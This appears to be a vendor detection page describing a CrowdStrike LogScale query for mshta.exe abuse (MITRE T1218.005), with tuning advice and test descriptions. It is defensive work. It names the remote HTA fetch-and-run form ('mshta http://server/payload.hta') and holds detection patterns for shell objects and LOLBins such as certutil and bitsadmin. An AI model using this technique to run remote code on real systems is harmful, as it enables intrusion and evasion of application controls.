Detect Mshta in CrowdStrike LogScale
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. Mshta.exe executes Microsoft HTML Applications (HTA) files outside of the Internet Explorer browser security context, bypassing browser security settings and application control solutions. HTA files can be loaded locally, from remote URLs (mshta http://server/payload.hta), or as inline scripts (mshta vbscript:...). This technique is widely used by nation-state APTs including FIN7, Lazarus Group, APT29, APT32, MuddyWater, Kimsuky, Sidewinder, Gamaredon, and many others, making it one of the most commonly abused LOLBins for initial access and execution.
MITRE ATT&CK
- Tactic
- Defense Evasion
- Technique
- T1218 System Binary Proxy Execution
- Sub-technique
- T1218.005 Mshta
- Canonical reference
- https://attack.mitre.org/techniques/T1218/005/
LogScale Detection Query
#event_simpleName=ProcessRollup2
| FileName = /(?i)^mshta\.exe$/ OR ParentBaseFileName = /(?i)^mshta\.exe$/
| RemoteURL := if(CommandLine = /(?i)https?:\/\//, "true", "false")
| InlineScript := if(CommandLine = /(?i)(vbscript:|javascript:)/, "true", "false")
| GetObject := if(CommandLine = /(?i)GetObject/, "true", "false")
| ShellInvoke := if(CommandLine = /(?i)(WScript\.Shell|Shell\.Application|CreateObject|ActiveXObject)/, "true", "false")
| OfficeParent := if(ParentBaseFileName = /(?i)^(winword|excel|outlook|powerpnt)\.exe$/, "true", "false")
| HTAPath := if(CommandLine = /(?i)(\\Temp\\|\\AppData\\|\\Downloads\\|\\Desktop\\|\\Public\\)/, "true", "false")
| SuspiciousChild := if(ParentBaseFileName = /(?i)^mshta\.exe$/ AND FileName = /(?i)^(cmd|powershell|wscript|cscript|certutil|bitsadmin|regsvr32|rundll32)\.exe$/, "true", "false")
| Suspicious := if(RemoteURL = "true" OR InlineScript = "true" OR GetObject = "true" OR ShellInvoke = "true" OR OfficeParent = "true" OR HTAPath = "true" OR SuspiciousChild = "true", "true", "false")
| filter(Suspicious = "true" OR ParentBaseFileName = /(?i)^mshta\.exe$/)
| select([timestamp, ComputerName, UserName, FileName, CommandLine, ParentBaseFileName, ParentCommandLine, RemoteURL, InlineScript, GetObject, ShellInvoke, OfficeParent, HTAPath, SuspiciousChild])
| sort(timestamp, order=desc, limit=500)CrowdStrike Falcon LogScale (CQL) query detecting T1218.005 mshta.exe abuse using Falcon sensor ProcessRollup2 events. Evaluates each matching process event across seven risk indicators mirroring the SPL reference logic, then filters to rows where any indicator fires or where mshta.exe appears as the parent process. Uses LogScale regex literals and conditional field assignment for readable, maintainable indicator scoring. Designed for the Falcon Data Replicator or Falcon LogScale (SIEM) environment.
Data Sources
Required Tables
False Positives & Tuning
- Falcon sensors deployed on systems running legacy HTA-based enterprise applications — particularly ERP or clinical systems where mshta.exe is part of a sanctioned application stack; build a suppression list keyed on ComputerName and a hash allowlist for known-good HTA binaries
- Software distribution workflows where ConfigMgr or a third-party deployment tool stages and executes HTA-based installer UIs in user-writable paths; the HTAPath indicator will fire consistently — correlate with Falcon's application inventory to identify managed installers
- Authorised offensive security engagements using mshta.exe as a test payload; Falcon's Detection Graph should surface associated IOAs regardless, but verify against the engagement schedule before escalating to IR
Other platforms for T1218.005
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Mshta Remote HTA Execution
Expected signal: Sysmon Event ID 1: mshta.exe with URL in command line. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8080. Sysmon Event ID 22 (DNS Query) if a domain was used instead of IP. Security Event ID 4688.
- Test 2Mshta Inline VBScript Execution
Expected signal: Sysmon Event ID 1: mshta.exe with 'vbscript:' and 'CreateObject' in command line. Sysmon Event ID 1: cmd.exe as a child of mshta.exe. Sysmon Event ID 11: File created at temp path. Security Event ID 4688 for both processes.
- Test 3Mshta Launched from Office Application Path
Expected signal: Sysmon Event ID 1: cmd.exe, then mshta.exe with vbscript: and Execute in command line. InlineScript, GetObject/ShellInvoke indicators fire. If the obfuscated CreateObject resolves, WScript.Shell child process spawns calc.exe as grandchild of mshta.
References (7)
- https://attack.mitre.org/techniques/T1218/005/
- https://lolbas-project.github.io/lolbas/Binaries/Mshta/
- https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/
- https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md
- https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
- https://msdn.microsoft.com/library/ms536471.aspx
Unlock Pro Content
Get the full detection package for T1218.005 including response playbook, investigation guide, and atomic red team tests.